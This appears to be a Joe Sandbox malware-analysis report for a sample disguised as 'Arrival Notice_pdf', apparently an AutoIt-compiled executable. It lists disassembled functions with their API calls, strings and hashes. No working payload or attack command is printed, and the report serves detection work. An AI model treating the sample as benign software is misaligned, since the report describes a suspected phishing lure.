String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 136f633582ab319143f1742aebcf73543a42d3deac950b79f6cb2f7696d934a5
Instruction ID: 51af5144d2bd3adec7f417f5552b8a795b843e5315fe52490f0df7a3354c9cb8
Opcode Fuzzy Hash: 136f633582ab319143f1742aebcf73543a42d3deac950b79f6cb2f7696d934a5
Instruction Fuzzy Hash: E1C1B5302342068FCB08FF10C555A6EB7A5AF96745F094869F8865B2E2DF70ED6ACF41

Function 002AD575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 002AD5AE
SetTextColor.GDI32(?,?), ref: 002AD5B2
GetSysColorBrush.USER32(0000000F), ref: 002AD5C8
GetSysColor.USER32(0000000F), ref: 002AD5D3
CreateSolidBrush.GDI32(?), ref: 002AD5D8
GetSysColor.USER32(00000011), ref: 002AD5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 002AD5FE
SelectObject.GDI32(?,00000000), ref: 002AD60F
SetBkColor.GDI32(?,00000000), ref: 002AD618
SelectObject.GDI32(?,?), ref: 002AD625
InflateRect.USER32(?,000000FF,000000FF), ref: 002AD644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002AD65B
GetWindowLongW.USER32(00000000,000000F0), ref: 002AD670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002AD698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002AD6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 002AD6DD
DrawFocusRect.USER32(?,?), ref: 002AD6E8
GetSysColor.USER32(00000011), ref: 002AD6F6
SetTextColor.GDI32(?,00000000), ref: 002AD6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002AD712
SelectObject.GDI32(?,002AD2A5), ref: 002AD729
DeleteObject.GDI32(?), ref: 002AD734
SelectObject.GDI32(?,?), ref: 002AD73A
DeleteObject.GDI32(?), ref: 002AD73F
SetTextColor.GDI32(?,?), ref: 002AD745
SetBkColor.GDI32(?,?), ref: 002AD74F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: c925893b67e1b0784736fdeaaf05b4aa4506f8cc8cd2eb29a25f3ea59d2ca08b
Instruction ID: 8ce147b5e3e9831e285da5216bef7494d478f32b455cd9526d4c5c0308e683ba
Opcode Fuzzy Hash: c925893b67e1b0784736fdeaaf05b4aa4506f8cc8cd2eb29a25f3ea59d2ca08b
Instruction Fuzzy Hash: A8515F71900208BFDF109FA4EC48EAEBB79FF09320F144525F916AB2A1D7719A40CF90

Function 002AB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002AB7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002AB7C1
CharNextW.USER32(0000014E), ref: 002AB7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002AB831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002AB847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002AB858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002AB875
SetWindowTextW.USER32(?,0000014E), ref: 002AB8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002AB8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 002AB90E
_memset.LIBCMT ref: 002AB933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002AB97C
_memset.LIBCMT ref: 002AB9DB
SendMessageW.USER32 ref: 002ABA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 002ABA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 002ABB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 002ABB2C
GetMenuItemInfoW.USER32(?), ref: 002ABB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002ABBA3
DrawMenuBar.USER32(?), ref: 002ABBB2
SetWindowTextW.USER32(?,0000014E), ref: 002ABBDA

Strings

0, xrefs: 002ABB4F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: 64b5b7533039b68a59bf3a4eb815747c52c9ab3f500c7c56856c8f450780c295
Instruction ID: 6ae23fdbc1c9b85a47d899a9de03cb51d4dfb989a5c4f03cadaa2f6ee45dd78d
Opcode Fuzzy Hash: 64b5b7533039b68a59bf3a4eb815747c52c9ab3f500c7c56856c8f450780c295
Instruction Fuzzy Hash: 62E1C471910209AFDF12CF65DC88EEE7B78FF06714F108156F919AA192DB7089A1DF60

Function 00242EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00242F7A
IsWindow.USER32(?), ref: 002B22FD

Strings

ALL, xrefs: 002B2264
L+/, xrefs: 002B21B2
LAST, xrefs: 002B20B6
P+/, xrefs: 002B21E0
REGEXPTITLE, xrefs: 002B20F8
TITLE, xrefs: 002B2292
REGEXPCLASS, xrefs: 002B2149
CLASS, xrefs: 002B2128
HANDLE, xrefs: 002B20E2
ACTIVE, xrefs: 002B20CC
INSTANCE, xrefs: 002B223C
H+/, xrefs: 002B2184
T+/, xrefs: 002B220E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$H+/$HANDLE$INSTANCE$L+/$LAST$P+/$REGEXPCLASS$REGEXPTITLE$T+/$TITLE
API String ID: 62970417-1882423035
Opcode ID: 40c0c32271e17ec06a16cf7d14cbdfc8b2b191a836de90e3977ca33cefb96e5a
Instruction ID: 8d9af2609d2a17aeb4adb63f800f36980e3e872a29574293467b8b09b05eadc7
Opcode Fuzzy Hash: 40c0c32271e17ec06a16cf7d14cbdfc8b2b191a836de90e3977ca33cefb96e5a
Instruction Fuzzy Hash: F9D1A430124746DBCB08EF10C481AEABBB4BF54384F50496AF856975A1DB70E9BECF91

Function 002A764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 002A778A
GetDesktopWindow.USER32 ref: 002A779F
GetWindowRect.USER32(00000000), ref: 002A77A6
GetWindowLongW.USER32(?,000000F0), ref: 002A7808
DestroyWindow.USER32(?), ref: 002A7834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002A785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002A787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002A78A1
SendMessageW.USER32(?,00000421,?,?), ref: 002A78B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002A78C9
IsWindowVisible.USER32(?), ref: 002A78E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002A7904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002A7918
GetWindowRect.USER32(?,?), ref: 002A7930
MonitorFromPoint.USER32(?,?,00000002), ref: 002A7956
GetMonitorInfoW.USER32 ref: 002A7970
CopyRect.USER32(?,?), ref: 002A7987
SendMessageW.USER32(?,00000412,00000000), ref: 002A79F2

Strings

tooltips_class32, xrefs: 002A7856
(, xrefs: 002A7965
0, xrefs: 002A7735

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 8edeaac13c7be7774c9c521d4811b317e67f1bc3b0511a1b4e9261a326673436
Instruction ID: 0df7d717542e97d167b99e44c96ec452ca4220fc8e922cc032669e2969894e9d
Opcode Fuzzy Hash: 8edeaac13c7be7774c9c521d4811b317e67f1bc3b0511a1b4e9261a326673436
Instruction Fuzzy Hash: 0BB18B71628301AFDB04DF64DD48B6ABBE4FF89710F00891DF5999B292DB70E814CB96

Function 0025A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0025A939
GetSystemMetrics.USER32(00000007), ref: 0025A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0025A96C
GetSystemMetrics.USER32(00000008), ref: 0025A974
GetSystemMetrics.USER32(00000004), ref: 0025A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0025A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0025A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0025A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0025AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0025AA2B
GetStockObject.GDI32(00000011), ref: 0025AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0025AA52

Part of subcall function 0025B63C: GetCursorPos.USER32(000000FF), ref: 0025B64F
Part of subcall function 0025B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0025B66C
Part of subcall function 0025B63C: GetAsyncKeyState.USER32(00000001), ref: 0025B691
Part of subcall function 0025B63C: GetAsyncKeyState.USER32(00000002), ref: 0025B69F

SetTimer.USER32(00000000,00000000,00000028,0025AB87), ref: 0025AA79

Strings

AutoIt v3 GUI, xrefs: 0025A9F1

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: cceb127d4533977d0e7e6c48adb2972871f161adb64867d69a3a87952000222e
Instruction ID: 3fc293f5d825aadd0708d3350378ec02f18115bdea016245346d42b01069e399
Opcode Fuzzy Hash: cceb127d4533977d0e7e6c48adb2972871f161adb64867d69a3a87952000222e
Instruction Fuzzy Hash: 66B18C71A1020A9FDB14DFA8DC4ABEE7BB8FB08315F114229FE15A7290DB70E850CB55

Function 002A3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002A3735
RegCreateKeyExW.ADVAPI32(?,?,00000000,002DDC00,00000000,?,00000000,?,?), ref: 002A37A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002A37EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002A3874
RegCloseKey.ADVAPI32(?), ref: 002A3B94
RegCloseKey.ADVAPI32(00000000), ref: 002A3BA1

Strings

REG_BINARY, xrefs: 002A3B2F
REG_DWORD, xrefs: 002A3A65
REG_EXPAND_SZ, xrefs: 002A3811
REG_SZ, xrefs: 002A38B2
REG_QWORD, xrefs: 002A3AE2
REG_MULTI_SZ, xrefs: 002A395C

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 08917680474d3a0474c3fb360b1034ee5a8abc8f35ead320a97982b532956aa6
Instruction ID: 367e6fb30a254cb9e1707a25fa86f9d036044695c231bb3574ee32786f2e8c37
Opcode Fuzzy Hash: 08917680474d3a0474c3fb360b1034ee5a8abc8f35ead320a97982b532956aa6
Instruction Fuzzy Hash: 5D025B756206019FCB14EF14C855A2AB7E5FF89720F04845DF98A9B3A1CB30ED65CF85

Function 002A6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002A6C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002A6D16

Strings

VIEWCHANGE, xrefs: 002A6ECD
GETSUBITEMCOUNT, xrefs: 002A6CA1
ISSELECTED, xrefs: 002A6D21
SELECTALL, xrefs: 002A6D75
DESELECT, xrefs: 002A6DFC
SELECTCLEAR, xrefs: 002A6D8D
SELECTINVERT, xrefs: 002A6DDE
GETITEMCOUNT, xrefs: 002A6C84
GETTEXT, xrefs: 002A6CBF
SELECT, xrefs: 002A6DA8
GETSELECTEDCOUNT, xrefs: 002A6CF9
FINDITEM, xrefs: 002A6E81
GETSELECTED, xrefs: 002A6E3C

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: fd625a33b5223b97a5cadfbe8668583bd850c198ea4156f2615ddc8b8b7ea760
Instruction ID: 3cef43b0be9fceb6581dfce3b67683f66cbf8b438f895122f93a4d22c9695415
Opcode Fuzzy Hash: fd625a33b5223b97a5cadfbe8668583bd850c198ea4156f2615ddc8b8b7ea760
Instruction Fuzzy Hash: 7CA1BE302303429FCB18EF20C955A6AB3A1BF45751F188969B9969B3D2DF70ED29CF41

Function 0027CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0027CF91
__swprintf.LIBCMT ref: 0027D032
_wcscmp.LIBCMT ref: 0027D045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0027D09A
_wcscmp.LIBCMT ref: 0027D0D6
GetClassNameW.USER32(?,?,00000400), ref: 0027D10D
GetDlgCtrlID.USER32(?), ref: 0027D15F
GetWindowRect.USER32(?,?), ref: 0027D195
GetParent.USER32(?), ref: 0027D1B3
ScreenToClient.USER32(00000000), ref: 0027D1BA
GetClassNameW.USER32(?,?,00000100), ref: 0027D234
_wcscmp.LIBCMT ref: 0027D248
GetWindowTextW.USER32(?,?,00000400), ref: 0027D26E
_wcscmp.LIBCMT ref: 0027D282

Strings

%s%u, xrefs: 0027D02C

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 64c10d5e948dfb0eda6cf640f46da11fb934fc14472a82f844130bb72e24db5b
Instruction ID: a1117bcf089fa3d22a50f1b940fff85ab2157823f06ba0fc733580983f7e7591
Opcode Fuzzy Hash: 64c10d5e948dfb0eda6cf640f46da11fb934fc14472a82f844130bb72e24db5b
Instruction Fuzzy Hash: FDA1C031224307AFD715DF64C884FAAB7A8FF44354F10852AFD9D92192EB30E966CB91

Function 0027D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0027D8EB
_wcscmp.LIBCMT ref: 0027D8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 0027D924
CharUpperBuffW.USER32(?,00000000), ref: 0027D941
_wcscmp.LIBCMT ref: 0027D95F
_wcsstr.LIBCMT ref: 0027D970
GetClassNameW.USER32(00000018,?,00000400), ref: 0027D9A8
_wcscmp.LIBCMT ref: 0027D9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 0027D9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 0027DA28
_wcscmp.LIBCMT ref: 0027DA38
GetClassNameW.USER32(00000010,?,00000400), ref: 0027DA60
GetWindowRect.USER32(00000004,?), ref: 0027DAC9

Strings

ThumbnailClass, xrefs: 0027D9B3, 0027DA33
@, xrefs: 0027D8C6

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 7cd679b5d3d6db8750d837d3239dd658730c1181a15a9d7cf4afac6286de92e8
Instruction ID: 7ab8aab769f6f4e8f0f3c83036e9f2bb13f9379c63f44d8fa29dc76be013851b
Opcode Fuzzy Hash: 7cd679b5d3d6db8750d837d3239dd658730c1181a15a9d7cf4afac6286de92e8
Instruction Fuzzy Hash: EE81A4310183069BDB05DF14D885F6A7BE8FF84318F14846AFD8D9A096DB30ED65CBA1

Function 0027D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0027D753

Strings

[REGEXPTITLE:, xrefs: 0027D77B
ALL, xrefs: 0027D7E7
[CLASS:, xrefs: 0027D7A3
[ACTIVE, xrefs: 0027D740
CLASSNAME=, xrefs: 0027D790
LAST, xrefs: 0027D718
REGEXP=, xrefs: 0027D768
[HANDLE:, xrefs: 0027D75F
[ALL, xrefs: 0027D7F9
ACTIVE, xrefs: 0027D72E
HANDLE=, xrefs: 0027D74C
[LAST, xrefs: 0027D800

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 63cbce682bd85c86b62547482030e842f9b94442ac58dc86c9eae4ffb2dbbad6
Instruction ID: b48fa44cfe22f1eb6ca439ca905ec131ca29c50e0c37c7bb5464fbe0af699f13
Opcode Fuzzy Hash: 63cbce682bd85c86b62547482030e842f9b94442ac58dc86c9eae4ffb2dbbad6
Instruction Fuzzy Hash: 8B31A131674209E6DB18EE50DE43FBEF3B49F22744F604139F945710E1EBA1AE398A12

Function 0027EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 0027EAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0027EAC2
SetWindowTextW.USER32(?,?), ref: 0027EAD9
GetDlgItem.USER32(?,000003EA), ref: 0027EAEE
SetWindowTextW.USER32(00000000,?), ref: 0027EAF4
GetDlgItem.USER32(?,000003E9), ref: 0027EB04
SetWindowTextW.USER32(00000000,?), ref: 0027EB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0027EB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0027EB45
GetWindowRect.USER32(?,?), ref: 0027EB4E
SetWindowTextW.USER32(?,?), ref: 0027EBB9
GetDesktopWindow.USER32 ref: 0027EBBF
GetWindowRect.USER32(00000000), ref: 0027EBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0027EC12
GetClientRect.USER32(?,?), ref: 0027EC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0027EC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0027EC6F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 23fdfc09f1d8f73b2dc71446f73b23184616936109721f5a4e1d3860f80d3d52
Instruction ID: 217ee819d226ce2cfe7e9559951d49adb7d24bd8f8128ba7a4215ff39f006ad8
Opcode Fuzzy Hash: 23fdfc09f1d8f73b2dc71446f73b23184616936109721f5a4e1d3860f80d3d52
Instruction Fuzzy Hash: A5515071900709AFDB209FA4DD89F6EBBB9FF08708F114568E546A25A0C774A914CF10

Function 002979B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 002979C6
LoadCursorW.USER32(00000000,00007F00), ref: 002979D1
LoadCursorW.USER32(00000000,00007F03), ref: 002979DC
LoadCursorW.USER32(00000000,00007F8B), ref: 002979E7
LoadCursorW.USER32(00000000,00007F01), ref: 002979F2
LoadCursorW.USER32(00000000,00007F81), ref: 002979FD
LoadCursorW.USER32(00000000,00007F88), ref: 00297A08
LoadCursorW.USER32(00000000,00007F80), ref: 00297A13
LoadCursorW.USER32(00000000,00007F86), ref: 00297A1E
LoadCursorW.USER32(00000000,00007F83), ref: 00297A29
LoadCursorW.USER32(00000000,00007F85), ref: 00297A34
LoadCursorW.USER32(00000000,00007F82), ref: 00297A3F
LoadCursorW.USER32(00000000,00007F84), ref: 00297A4A
LoadCursorW.USER32(00000000,00007F04), ref: 00297A55
LoadCursorW.USER32(00000000,00007F02), ref: 00297A60
LoadCursorW.USER32(00000000,00007F89), ref: 00297A6B
GetCursorInfo.USER32(?), ref: 00297A7B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

